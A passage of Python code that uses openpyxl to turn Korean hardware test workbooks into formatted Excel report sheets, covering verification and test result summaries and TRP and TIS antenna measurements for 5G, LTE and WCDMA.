mCell in sheet_out[\"B29:E29\"]:\n for cell in mCell:\n cell.alignment = self.top_alignment_3\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n sheet_width_list = [3.38, 20, 20, 20, 20]\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[29].height = 85.5\n\n # Set style on Cell\n # row 3\n sheet_out['B3'].font = self.top_font\n sheet_out['B3'].alignment = self.top_alignment\n # row 4\n sheet_out['B4'].font = self.index_font\n sheet_out['B4'].fill = self.brown_fill\n sheet_out['B4'].border = self.thin_border\n sheet_out['D4'].font = self.index_font\n sheet_out['D4'].border = self.thin_border\n sheet_out['C4'].border = self.thin_border\n sheet_out['E4'].border = self.thin_border\n # row 5\n sheet_out['B5'].font = self.index_font\n sheet_out['B5'].fill = self.brown_fill\n sheet_out['B5'].border = self.thin_border\n sheet_out['D5'].font = self.index_font\n sheet_out['D5'].border = self.thin_border\n sheet_out['C5'].border = self.thin_border\n sheet_out['E5'].border = self.thin_border\n # row 6\n sheet_out['B6'].font = self.index_font\n sheet_out['B6'].fill = self.brown_fill\n sheet_out['B6'].border = self.thin_border\n sheet_out['D6'].font = self.index_font\n sheet_out['D6'].border = self.thin_border\n sheet_out['C6'].border = self.thin_border\n sheet_out['E6'].border = self.thin_border\n # row 7\n sheet_out['B7'].font = self.index_font\n sheet_out['B7'].fill = self.brown_fill\n sheet_out['B7'].border = self.thin_border\n sheet_out['D7'].font = self.index_font\n sheet_out['D7'].border = self.thin_border\n sheet_out['C7'].border = self.thin_border\n sheet_out['E7'].border = self.thin_border\n # row 8\n sheet_out['B8'].font = self.index_font\n sheet_out['B8'].fill = self.brown_fill\n sheet_out['B8'].border = self.thin_border\n sheet_out['D8'].font = self.index_font\n sheet_out['D8'].border = self.thin_border\n sheet_out['C8'].border = self.thin_border\n sheet_out['E8'].border = self.thin_border\n # row 10\n sheet_out['B10'].font = self.top_font\n sheet_out['B10'].alignment = self.top_alignment\n # row 11\n sheet_out['B11'].font = self.index_font\n sheet_out['B11'].fill = self.brown_fill\n sheet_out['B11'].border = self.thin_border\n sheet_out['C11'].font = self.index_font\n sheet_out['C11'].border = self.thin_border\n sheet_out['D11'].border = self.thin_border\n sheet_out['D11'].font = self.index_font\n sheet_out['E11'].border = self.thin_border\n\n # row 12\n sheet_out['B12'].font = self.index_font\n sheet_out['B12'].fill = self.brown_fill\n sheet_out['B12'].border = self.thin_border\n sheet_out['C12'].font = self.index_font\n sheet_out['C12'].border = self.thin_border\n sheet_out['D12'].border = self.thin_border\n sheet_out['D12'].font = self.index_font\n sheet_out['E12'].border = self.thin_border\n # row 14\n sheet_out['B14'].font = self.top_font\n sheet_out['B14'].alignment = self.top_alignment\n # row 15\n sheet_out['B15'].font = self.index_font\n sheet_out['B15'].fill = self.brown_fill\n sheet_out['B15'].border = self.thin_border\n sheet_out['D15'].font = self.index_font\n sheet_out['D15'].fill = self.brown_fill\n sheet_out['D15'].border = self.thin_border\n sheet_out['E15'].font = self.index_font\n sheet_out['E15'].fill = self.brown_fill\n sheet_out['E15'].border = self.thin_border\n sheet_out['C15'].border = self.thin_border\n # row 16\n sheet_out['B16'].font = self.index_font\n sheet_out['B16'].fill = self.gray_fill\n sheet_out['B16'].border = self.thin_border\n sheet_out['C16'].font = self.index_font\n sheet_out['C16'].fill = self.gray_fill\n sheet_out['C16'].border = self.thin_border\n sheet_out['D16'].font = self.index_font\n sheet_out['D16'].border = self.thin_border\n sheet_out['E16'].font = self.index_font\n sheet_out['E16'].border = self.thin_border\n # row 17\n sheet_out['B17'].border = self.thin_border\n sheet_out['C17'].font = self.index_font\n sheet_out['C17'].fill = self.gray_fill\n sheet_out['C17'].border = self.thin_border\n sheet_out['D17'].font = self.index_font\n sheet_out['D17'].border = self.thin_border\n sheet_out['E17'].font = self.index_font\n sheet_out['E17'].border = self.thin_border\n # row 18\n sheet_out['B18'].border = self.thin_border\n sheet_out['C18'].font = self.index_font\n sheet_out['C18'].fill = self.gray_fill\n sheet_out['C18'].border = self.thin_border\n sheet_out['D18'].font = self.index_font\n sheet_out['D18'].border = self.thin_border\n sheet_out['E18'].font = self.index_font\n sheet_out['E18'].border = self.thin_border\n # row 19\n sheet_out['B19'].border = self.thin_border\n sheet_out['C19'].font = self.index_font\n sheet_out['C19'].fill = self.gray_fill\n sheet_out['C19'].border = self.thin_border\n sheet_out['D19'].font = self.index_font\n sheet_out['D19'].border = self.thin_border\n sheet_out['E19'].font = self.index_font\n sheet_out['E19'].border = self.thin_border\n # row 20\n sheet_out['B20'].font = self.index_font\n sheet_out['B20'].fill = self.gray_fill\n sheet_out['B20'].border = self.thin_border\n sheet_out['D20'].font = self.index_font\n sheet_out['D20'].border = self.thin_border\n sheet_out['E20'].font = self.index_font\n sheet_out['E20'].border = self.thin_border\n sheet_out['C20'].border = self.thin_border\n # row 21\n sheet_out['B21'].font = self.index_font\n sheet_out['B21'].fill = self.gray_fill\n sheet_out['B21'].border = self.thin_border\n sheet_out['D21'].font = self.index_font\n sheet_out['D21'].border = self.thin_border\n sheet_out['E21'].font = self.index_font\n sheet_out['E21'].border = self.thin_border\n sheet_out['C21'].border = self.thin_border\n # row 22\n sheet_out['B22'].font = self.index_font\n sheet_out['B22'].fill = self.gray_fill\n sheet_out['B22'].border = self.thin_border\n sheet_out['D22'].font = self.index_font\n sheet_out['D22'].border = self.thin_border\n sheet_out['E22'].font = self.index_font\n sheet_out['E22'].border = self.thin_border\n sheet_out['C22'].border = self.thin_border\n # row 23\n sheet_out['B23'].font = self.index_font\n sheet_out['B23'].fill = self.gray_fill\n sheet_out['B23'].border = self.thin_border\n sheet_out['D23'].font = self.index_font\n sheet_out['D23'].border = self.thin_border\n sheet_out['E23'].font = self.index_font\n sheet_out['E23'].border = self.thin_border\n sheet_out['C23'].border = self.thin_border\n # row 24\n sheet_out['B24'].font = self.index_font\n sheet_out['B24'].fill = self.light_brown_fill\n sheet_out['B24'].border = self.thin_border\n sheet_out['D24'].font = self.index_font\n sheet_out['D24'].fill = self.light_brown_fill\n sheet_out['D24'].border = self.thin_border\n sheet_out['C24'].border = self.thin_border\n sheet_out['E24'].border = self.thin_border\n sheet_out['E24'].fill = self.light_brown_fill\n # row 25\n sheet_out['B25'].font = self.index_font\n sheet_out['B25'].fill = self.light_brown_fill\n sheet_out['B25'].border = self.thin_border\n sheet_out['D25'].font = self.index_font\n sheet_out['D25'].fill = self.light_brown_fill\n sheet_out['D25'].border = self.thin_border\n sheet_out['C25'].border = self.thin_border\n sheet_out['E25'].border = self.thin_border\n # row 26\n sheet_out['B26'].font = self.index_font\n sheet_out['B26'].fill = self.gray_fill\n sheet_out['B26'].border = self.thin_border\n sheet_out['D26'].font = self.index_font\n sheet_out['D26'].fill = self.light_brown_fill\n sheet_out['D26'].border = self.thin_border\n sheet_out['C25'].border = self.thin_border\n sheet_out['E25'].border = self.thin_border\n # row 28\n sheet_out['B28'].font = self.index_font\n # row 29\n sheet_out['B29'].font = self.index_font\n sheet_out['B29'].border = self.thin_border\n sheet_out['C29'].border = self.thin_border\n sheet_out['D29'].border = self.thin_border\n sheet_out['E29'].border = self.thin_border\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"검증요약결과\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 시험결과요약 Tab\n def test_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n temp_data = []\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n\n # get data from wb_input\n sheet_in = wb_input['시험결과요약']\n for i in range(6, 28):\n temp_data.append([sheet_in['F'+str(i)].value, sheet_in['G'+str(i)].value, sheet_in['H'+str(i)].value])\n\n #option setting wb.output\n sheet_out = wb_output['시험결과요약']\n # sheet row 2 handle\n sheet_out.merge_cells('B2:H2')\n sheet_out['B2'] = 'H/W 검증결과 요약'\n\n # sheet row 4 and 5 handle\n sheet_out.merge_cells('B4:C5')\n sheet_out['B4'] = \"항목\"\n sheet_out.merge_cells('D4:E5')\n sheet_out['D4'] = 'Test case'\n sheet_out.merge_cells('F4:H4')\n sheet_out['F4'] = '결과'\n sheet_out['F5'] = 'Pass'\n sheet_out['G5'] = 'Fail'\n sheet_out['H5'] = '점수'\n\n # sheet 6 ~ 20 handle\n sheet_out.merge_cells('B6:B20')\n sheet_out['B6'] = sheet_in['B6'].value\n sheet_out.merge_cells('C6:C10')\n sheet_out['C6'] = sheet_in['C6'].value\n sheet_out.merge_cells('C11:C15')\n sheet_out['C11'] = sheet_in['C11'].value\n sheet_out.merge_cells('C16:C19')\n sheet_out['C16'] = sheet_in['C16'].value\n sheet_out['C20'] = sheet_in['C20'].value\n sheet_out.merge_cells('D6:D7')\n sheet_out['D6'] = sheet_in['D6'].value\n sheet_out.merge_cells('D8:D9')\n sheet_out['D8'] = sheet_in['D8'].value\n sheet_out['D10'] = sheet_in['D10'].value\n sheet_out.merge_cells('D11:D12')\n sheet_out['D11'] = sheet_in['D11'].value\n sheet_out.merge_cells('D13:D14')\n sheet_out['D13'] = sheet_in['D13'].value\n sheet_out['D15'] = sheet_in['D15'].value\n sheet_out.merge_cells('D16:D17')\n sheet_out['D16'] = sheet_in['D16'].value\n sheet_out.merge_cells('D18:D19')\n sheet_out['D18'] = sheet_in['D18'].value\n sheet_out['D20'] = sheet_in['D20'].value\n sheet_out['E6'] = sheet_in['E6'].value\n sheet_out['E7'] = sheet_in['E7'].value\n sheet_out['E8'] = sheet_in['E8'].value\n sheet_out['E9'] = sheet_in['E9'].value\n sheet_out['E10'] = sheet_in['E10'].value\n sheet_out['E11'] = sheet_in['E11'].value\n sheet_out['E12'] = sheet_in['E12'].value\n sheet_out['E13'] = sheet_in['E13'].value\n sheet_out['E14'] = sheet_in['E14'].value\n sheet_out['E15'] = sheet_in['E15'].value\n sheet_out['E16'] = sheet_in['E16'].value\n sheet_out['E17'] = sheet_in['E17'].value\n sheet_out['E18'] = sheet_in['E18'].value\n sheet_out['E19'] = sheet_in['E19'].value\n sheet_out['E20'] = sheet_in['E20'].value\n\n # sheet 21 ~ 24 handle\n sheet_out.merge_cells('B21:C24')\n sheet_out['B21'] = sheet_in['B21'].value\n sheet_out.merge_cells('D21:D22')\n sheet_out['D21'] = sheet_in['D21'].value\n sheet_out.merge_cells('D23:D24')\n sheet_out['D23'] = sheet_in['D23'].value\n sheet_out['E21'] = sheet_in['E21'].value\n sheet_out['E22'] = sheet_in['E22'].value\n sheet_out['E23'] = sheet_in['E23'].value\n sheet_out['E24'] = sheet_in['E24'].value\n\n #sheet 25 ~ 28 handle\n sheet_out.merge_cells('B25:C25')\n sheet_out['B25'] = sheet_in['B25'].value\n sheet_out.merge_cells('D25:E25')\n sheet_out['D25'] = sheet_in['D25'].value\n sheet_out.merge_cells('B26:C26')\n sheet_out['B26'] = sheet_in['B26'].value\n sheet_out.merge_cells('D26:E26')\n sheet_out['D26'] = sheet_in['D26'].value\n sheet_out.merge_cells('B27:C27')\n sheet_out['B27'] = '발열'\n sheet_out.merge_cells('D27:E27')\n sheet_out['D27'] = 'Live Streaming (충전/미충전), 게임(충전/미충전)'\n sheet_out.merge_cells('B28:E28')\n sheet_out['B28'] = sheet_in['B27'].value\n sheet_out.merge_cells('B29:C29')\n sheet_out['B29'] = sheet_in['B28'].value\n sheet_out.merge_cells('D29:E29')\n sheet_out['D29'] = sheet_in['D28'].value\n sheet_out.merge_cells('F29:H29')\n sheet_out['F29'] = sheet_in['F28'].value\n\n self.setPrintText('/s {}번 파일 \"시험결과요약\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n for i in range(6, 27):\n\n sheet_out['F' + str(i)] = temp_data[i-6][0]\n sheet_out['G' + str(i)] = temp_data[i-6][1]\n sheet_out['H' + str(i)] = temp_data[i-6][2]\n\n sheet_out['F28'] = temp_data[21][0]\n sheet_out['G28'] = temp_data[21][1]\n sheet_out['H28'] = temp_data[21][2]\n\n if self.opFlag:\n\n # all cell aligment adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['B2'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n sheet_out['B2'].alignment = self.general_alignment\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\n sheet_width_list = [3.38, 9, 14.25, 8.5, 36.75, 11.25, 11.25, 11.25]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[2].height = 26.25\n\n # Set Pattern Fill\n sheet_out['B4'].fill = self.brown_fill\n sheet_out['D4'].fill = self.brown_fill\n sheet_out['F4'].fill = self.brown_fill\n sheet_out['F5'].fill = self.brown_fill\n sheet_out['G5'].fill = self.brown_fill\n sheet_out['H5'].fill = self.brown_fill\n\n for i in range(6, 28):\n sheet_out['B' + str(i)].fill = self.gray_fill\n sheet_out['C' + str(i)].fill = self.gray_fill\n sheet_out['D' + str(i)].fill = self.gray_fill\n sheet_out['E' + str(i)].fill = self.gray_fill\n\n sheet_out['B28'].fill = self.dark_gray_fill\n sheet_out['F28'].fill = self.dark_gray_fill\n sheet_out['G28'].fill = self.dark_gray_fill\n sheet_out['H28'].fill = self.dark_gray_fill\n sheet_out['B29'].fill = self.gray_fill\n sheet_out['D29'].fill = self.gray_fill\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"시험결과요약\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # TRP Tab\n def trp_generate_data(self):\n # 절대값 abs\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_5g_trp = []\n list_lte_trp = []\n list_wcdma_trp = []\n\n # get data from wb_input\n sheet_in = wb_input['5G OTA']\n list_5g_trp.append(self.check_num(sheet_in['J5'].value))\n list_5g_trp.append(self.check_num(sheet_in['J6'].value))\n\n sheet_in = wb_input['LTE OTA']\n list_lte_trp.append(self.check_num(sheet_in['K17'].value))\n list_lte_trp.append(self.check_num(sheet_in['C17'].value))\n list_lte_trp.append(self.check_num(sheet_in['C10'].value))\n list_lte_trp.append(self.check_num(sheet_in['G17'].value))\n list_lte_trp.append(self.check_num(sheet_in['G10'].value))\n list_lte_trp.append(self.check_num(sheet_in['M17'].value))\n list_lte_trp.append(self.check_num(sheet_in['E17'].value))\n list_lte_trp.append(self.check_num(sheet_in['E10'].value))\n list_lte_trp.append(self.check_num(sheet_in['I17'].value))\n list_lte_trp.append(self.check_num(sheet_in['I10'].value))\n\n sheet_in = wb_input['WCDMA OTA']\n list_wcdma_trp.append(self.check_num(sheet_in['D9'].value))\n\n #option setting wb.output\n sheet_out = wb_output['TRP']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = 'TRP 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ SISO TRP'\n sheet_out['A4'] = ' - 5G'\n\n # sheet row 5 and 7 handle\n sheet_out['A5'] = '구분'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out['C5'] = '측정결과'\n sheet_out['D5'] = '비교'\n sheet_out['A6'] = 'CP-OFDM (n78)'\n sheet_out['B6'] = '16.86dBm(V50S)'\n sheet_out['C6'] = list_5g_trp[0]+'dBm'\n # sheet_out['D6'] = self.check_num(abs(round(abs(float(list_5g_trp[0]))-16.86, 2))) + 'dBm'\n sheet_out['D6'] = self.cal_comparison(16.86, list_5g_trp[0]) + 'dBm'\n sheet_out['A7'] = 'DFTs-OFDM (n78)'\n sheet_out['B7'] = '-'\n sheet_out['C7'] = list_5g_trp[1]+'dBm'\n sheet_out['D7'] = '-'\n\n # sheet row 8 and 15 handle\n sheet_out['A8'] = ' - LTE'\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = '기준(RHP)'\n sheet_out['C9'] = '측정결과'\n sheet_out['D9'] = '비교'\n\n sheet_out['A10'] = 'Band 1 15M'\n sheet_out['B10'] = '14.00dBm'\n sheet_out['C10'] = list_lte_trp[0] + 'dBm'\n # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_lte_trp[0]))-14.00, 2))) + 'dBm'\n sheet_out['D10'] = self.cal_comparison(14.00, list_lte_trp[0]) + 'dBm'\n sheet_out['A11'] = 'Band 3 20M'\n sheet_out['B11'] = '15.00dBm'\n sheet_out['C11'] = list_lte_trp[1] + 'dBm'\n # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_lte_trp[1]))-15.00, 2))) + 'dBm'\n sheet_out['D11'] = self.cal_comparison(15.00, list_lte_trp[1]) + 'dBm'\n sheet_out['A12'] = 'Band 5 10M'\n sheet_out['B12'] = '13.50dBm'\n sheet_out['C12'] = list_lte_trp[2] + 'dBm'\n # sheet_out['D12'] = self.check_num(abs(round(abs(float(list_lte_trp[2]))-13.50, 2))) + 'dBm'\n sheet_out['D12'] = self.cal_comparison(13.50, list_lte_trp[2]) + 'dBm'\n sheet_out['A13'] = 'Band 7 20M'\n sheet_out['B13'] = '13.00dBm'\n sheet_out['C13'] = list_lte_trp[3] + 'dBm'\n # sheet_out['D13'] = self.check_num(abs(round(abs(float(list_lte_trp[3])) - 13.00, 2))) + 'dBm'\n sheet_out['D13'] = self.cal_comparison(13.00, list_lte_trp[3]) + 'dBm'\n sheet_out['A14'] = 'Band 7 10M'\n sheet_out['B14'] = '13.00dBm'\n sheet_out['C14'] = list_lte_trp[4] + 'dBm'\n # sheet_out['D14'] = self.check_num(abs(round(abs(float(list_lte_trp[4])) - 13.00, 2))) + 'dBm'\n sheet_out['D14'] = self.cal_comparison(13.00, list_lte_trp[4]) + 'dBm'\n\n # sheet row 15 and 17 handle\n sheet_out['A15'] = ' - WCDMA (납품검사 결과)'\n sheet_out['A16'] = '구분'\n sheet_out['B16'] = '기준(RHP)'\n sheet_out['C16'] = '측정결과'\n sheet_out['A17'] = 'Band 1'\n sheet_out['B17'] = '15.00dBm'\n sheet_out['C17'] = list_wcdma_trp[0] + 'dBm'\n # sheet_out['D17'] = self.check_num(abs(round(abs(float(list_wcdma_trp[0])) - 15.00, 2))) + 'dBm'\n sheet_out['D17'] = self.cal_comparison(15.00, list_wcdma_trp[0]) + 'dBm'\n\n # sheet row 19 and 27 handle\n sheet_out['A19'] = '▣ MIMO TRP'\n sheet_out['A20'] = ' - LTE'\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = '기준(RHP)'\n sheet_out['C21'] = '측정결과'\n sheet_out['A22'] = 'Band 1 15M'\n sheet_out['B22'] = '14.00dBm'\n sheet_out['C22'] = list_lte_trp[5] + 'dBm'\n # sheet_out['D22'] = self.check_num(abs(round(abs(float(list_lte_trp[5])) - 14.00, 2))) + 'dBm'\n sheet_out['D22'] = self.cal_comparison(14.00, list_lte_trp[5]) + 'dBm'\n sheet_out['A23'] = 'Band 3 20M'\n sheet_out['B23'] = '15.00dBm'\n sheet_out['C23'] = list_lte_trp[6] + 'dBm'\n # sheet_out['D23'] = self.check_num(abs(round(abs(float(list_lte_trp[6])) - 15.00, 2))) + 'dBm'\n sheet_out['D23'] = self.cal_comparison(15.00, list_lte_trp[6]) + 'dBm'\n sheet_out['A24'] = 'Band 5 10M'\n sheet_out['B24'] = '13.50dBm'\n sheet_out['C24'] = list_lte_trp[7]+'dBm'\n # sheet_out['D24'] = self.check_num(abs(round(abs(float(list_lte_trp[7])) - 13.50, 2))) + 'dBm'\n sheet_out['D24'] = self.cal_comparison(13.50, list_lte_trp[7]) + 'dBm'\n sheet_out['A25'] = 'Band 7 20M'\n sheet_out['B25'] = '13.00dBm'\n sheet_out['C25'] = list_lte_trp[8] + 'dBm'\n # sheet_out['D25'] = self.check_num(abs(round(abs(float(list_lte_trp[8])) - 13.00, 2))) + 'dBm'\n sheet_out['D25'] = self.cal_comparison(13.00, list_lte_trp[8]) + 'dBm'\n sheet_out['A26'] = 'Band 7 10M'\n sheet_out['B26'] = '13.00dBm'\n sheet_out['C26'] = list_lte_trp[9] + 'dBm'\n # sheet_out['D26'] = self.check_num(abs(round(abs(float(list_lte_trp[9])) - 13.00, 2))) + 'dBm'\n sheet_out['D26'] = self.cal_comparison(13.00, list_lte_trp[9]) + 'dBm'\n\n self.setPrintText('/s {}번 파일 \"TRP\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D26\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['A8'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D7\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A9:D14\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A16:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A21:D26\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:D26\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 16.75, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [5, 9, 16, 21]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [6, 7, 10, 11, 12, 13, 14, 17, 22, 23, 24, 25, 26]:\n sheet_out['A'+str(i)].fill = self.gray_fill\n sheet_out['B'+str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"TRP\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # TIS Tab\n def tis_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_5g_tis = []\n list_lte_tis = []\n list_wcdma_tis = []\n\n # get data from wb_input\n sheet_in = wb_input['5G OTA']\n list_5g_tis.append(self.check_num(sheet_in['J7'].value))\n list_5g_tis.append(self.check_num(sheet_in['J8'].value))\n\n sheet_in = wb_input['LTE OTA']\n list_lte_tis.append(self.check_num(sheet_in['L17'].value))\n list_lte_tis.append(self.check_num(sheet_in['D17'].value))\n list_lte_tis.append(self.check_num(sheet_in['D10'].value))\n list_lte_tis.append(self.check_num(sheet_in['H17'].value))\n list_lte_tis.append(self.check_num(sheet_in['H10'].value))\n list_lte_tis.append(self.check_num(sheet_in['N17'].value))\n list_lte_tis.append(self.check_num(sheet_in['F17'].value))\n list_lte_tis.append(self.check_num(sheet_in['F10'].value))\n list_lte_tis.append(self.check_num(sheet_in['J17'].value))\n list_lte_tis.append(self.check_num(sheet_in['J10'].value))\n\n sheet_in = wb_input['WCDMA OTA']\n list_wcdma_tis.append(self.check_num(sheet_in['E9'].value))\n\n #option setting wb.output\n sheet_out = wb_output['TIS']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = 'TIS 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ SISO TIS'\n sheet_out['A4'] = ' - 5G'\n\n # sheet row 5 and 7 handle\n sheet_out['A5'] = '구분'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out['C5'] = '측정결과'\n sheet_out['D5'] = '비교'\n sheet_out['A6'] = 'SISO (n78)'\n sheet_out['B6'] = '-'\n sheet_out['C6'] = list_5g_tis[0] + 'dBm'\n sheet_out['D6'] = '-'\n\n # sheet row 8 and 14 handle\n sheet_out['A8'] = ' - LTE'\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = '기준(RHP)'\n sheet_out['C9'] = '측정결과'\n sheet_out['D9'] = '비교'\n sheet_out['A10'] = 'Band 1 15M'\n sheet_out['B10'] = '-92.00dBm'\n sheet_out['C10'] = list_lte_tis[0] + 'dBm'\n # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_lte_tis[0])) - 92.00, 2))) + 'dBm'\n sheet_out['D10'] = self.cal_comparison(92.00, list_lte_tis[0]) + 'dBm'\n sheet_out['A11'] = 'Band 3 20M'\n sheet_out['B11'] = '-91.00dBm'\n sheet_out['C11'] = list_lte_tis[1] + 'dBm'\n # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_lte_tis[1])) - 91.00, 2))) + 'dBm'\n sheet_out['D11'] = self.cal_comparison(91.00, list_lte_tis[1]) + 'dBm'\n sheet_out['A12'] = 'Band 5 10M'\n sheet_out['B12'] = '-87.00dBm'\n sheet_out['C12'] = list_lte_tis[2] + 'dBm'\n # sheet_out['D12'] = self.check_num(abs(round(abs(float(list_lte_tis[2])) - 87.00, 2))) + 'dBm'\n sheet_out['D12'] = self.cal_comparison(87.00, list_lte_tis[2]) + 'dBm'\n sheet_out['A13'] = 'Band 7 20M'\n sheet_out['B13'] = '-90.00dBm'\n sheet_out['C13'] = list_lte_tis[3] + 'dBm'\n sheet_out['D13'] = self.check_num(abs(round(abs(float(list_lte_tis[3])) - 90.00, 2))) + 'dBm'\n sheet_out['D13'] = self.cal_comparison(90.00, list_lte_tis[3]) + 'dBm'\n sheet_out['A14'] = 'Band 7 10M'\n sheet_out['B14'] = '-93.00dBm'\n sheet_out['C14'] = list_lte_tis[4] + 'dBm'\n # sheet_out['D14'] = self.check_num(abs(round(abs(float(list_lte_tis[4])) - 93.00, 2))) + 'dBm'\n sheet_out['D14'] = self.cal_comparison(93.00, list_lte_tis[4]) + 'dBm'\n\n # sheet row 16 and 18 handle\n sheet_out['A15'] = ' - WCDMA (납품검사 결과)'\n sheet_out['A16'] = '구분'\n sheet_out['B16'] = '기준(RHP)'\n sheet_out['C16'] = '측정결과'\n sheet_out['D16'] = '비교'\n sheet_out['A17'] = 'Band 1'\n sheet_out['B17'] = '-104.00dBm'\n sheet_out['C17'] = list_wcdma_tis[0] + 'dBm'\n # sheet_out['D17'] = self.check_num(abs(round(abs(float(list_wcdma_tis[0])) - 104.00, 2))) + 'dBm'\n sheet_out['D17'] = self.cal_comparison(104.00, list_wcdma_tis[0]) + 'dBm'\n\n # sheet row 19 and 22 handle\n sheet_out['A19'] = '▣ MIMO TRP'\n sheet_out['A20'] = ' - 5G'\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = '기준(RHP)'\n sheet_out['C21'] = '측정결과'\n sheet_out['D21'] = '비교'\n sheet_out['A22'] = 'MIMO 4X4 (n78)'\n sheet_out['B22'] = '-'\n sheet_out['C22'] = list_5g_tis[1] + 'dBm'\n sheet_out['D22'] = '-'\n\n # sheet row 24 and 30 handle\n sheet_out['A24'] = ' - LTE'\n sheet_out['A25'] = '구분'\n sheet_out['B25'] = '기준(RHP)'\n sheet_out['C25'] = '측정결과'\n sheet_out['D25'] = '비교'\n sheet_out['A26'] = 'Band 1 15M'\n sheet_out['B26'] = '-86.00dBm'\n sheet_out['C26'] = list_lte_tis[5] + 'dBm'\n # sheet_out['D26'] = self.check_num(abs(round(abs(float(list_lte_tis[5])) - 86.00, 2))) + 'dBm'\n sheet_out['D26'] = self.cal_comparison(86.00, list_lte_tis[5]) + 'dBm'\n sheet_out['A27'] = 'Band 3 20M'\n sheet_out['B27'] = '-86.00dBm'\n sheet_out['C27'] = list_lte_tis[6] + 'dBm'\n # sheet_out['D27'] = self.check_num(abs(round(abs(float(list_lte_tis[6])) - 86.00, 2))) + 'dBm'\n sheet_out['D27'] = self.cal_comparison(86.00, list_lte_tis[6]) + 'dBm'\n sheet_out['A28'] = 'Band 5 10M'\n sheet_out['B28'] = '-82.50dBm'\n sheet_out['C28'] = list_lte_tis[7] + 'dBm'\n # sheet_out['D28'] = self.check_num(abs(round(abs(float(list_lte_tis[7])) - 82.50, 2))) + 'dBm'\n sheet_out['D28'] = self.cal_comparison(82.50, list_lte_tis[7]) + 'dBm'\n sheet_out['A29'] = 